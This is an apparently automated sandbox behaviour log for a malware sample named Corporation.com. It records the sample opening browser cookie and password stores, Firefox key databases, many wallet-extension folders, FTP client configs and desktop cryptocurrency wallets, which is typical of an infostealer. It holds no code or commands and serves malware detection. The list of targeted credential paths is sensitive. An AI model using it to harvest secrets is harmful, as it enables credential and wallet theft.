      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
